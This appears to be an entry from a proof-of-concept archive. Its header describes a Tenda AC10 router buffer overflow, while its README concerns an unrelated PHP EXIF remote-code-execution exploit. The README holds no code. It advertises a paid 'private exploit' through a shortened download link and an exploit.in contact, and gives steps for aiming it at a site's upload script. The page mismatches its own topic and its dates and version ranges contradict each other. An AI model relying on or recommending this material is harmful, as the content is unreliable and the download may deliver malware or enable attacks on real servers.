Associated Vulnerability
Title:Tenda AC10 安全漏洞 (CVE-2024-2856)Description:Tenda AC10是中国腾达(Tenda)公司的一款无线路由器。 Tenda AC10 16.03.10.13 版本存在安全漏洞,该漏洞源于 /goform/SetSysTimeCfg 页面的 fromSetSysTime 方法中的timeZone 参数存在基于堆栈的缓冲区溢出。
Description
Tenda AC10 Router exploit stack-based buffer overflow
Readme
# PHP EXIF Memory Corruption Exploit to RCE (CVE-2019-9641)

## Overview
A critical vulnerability has been discovered in PHP versions up to 7.1.26, 7.2.15, and 7.3.2, specifically affecting the `exif_process_IFD_in_TIFF` function within the EXIF component. This vulnerability, classified under CWE-119, involves memory corruption through manipulation of an unknown input, leading to unauthorized memory access.
## Details
- **CVE ID**: [CVE-2019-9641](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9641)
- **Discovered**: 03/12/2019
- **Published**: 03/09/2019
- **Actual**: Yes
- **Impact**: Confidentiality, Integrity, Availability
- **Exploitable**: Remotely, without authentication
- **Technical Details**: Known
- **Exploit Availability**: Not public
## Vulnerability Description
The vulnerability resides in the EXIF component of PHP, where the function `exif_process_IFD_in_TIFF` performs operations on a memory buffer, potentially reading from or writing to memory outside the buffer’s intended boundaries. This can lead to memory corruption, posing significant risks to the system’s confidentiality, integrity, and availability.
## Affected Versions
- PHP 7.1.0 - 7.1.27
- PHP 7.2.0 - 7.2.16
- PHP 7.3.0 - 7.3.3
## Mitigation
Upgrading to the following versions eliminates the vulnerability:
- PHP 7.1.27
- PHP 7.2.16
- PHP 7.3.3
## Exploit Details
NO PUBLIC exploit is available, but the estimated price for this PRIVATE EXPLOIT is $500-$5k.
## Detection
The commercial vulnerability scanner Qualys can detect this issue using plugin 197405, which tests for vulnerabilities in PHP 7.0 and 7.2 as reported in the Ubuntu Security Notification (USN-3922-1).
## Running
To run the exploit, replace 'https://YOUR-SITE.com/upload.php' with the actual URL of the vulnerable PHP script handling image uploads in exploit.php, then execute
```bash
php cve-2019-9641-RCE.php
```
from the command line after saving the changes.
## Contact
For inquiries, please contact **schnaidr01@exploit.in**
## Exploit:
### [Download here](https://t.ly/wYBE9)


Copies are limited.</br>
For education purposes only.
File Snapshot
[4.0K] /data/pocs/e614972a86f97254119be0de81f13af0ac12e453
└── [2.4K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.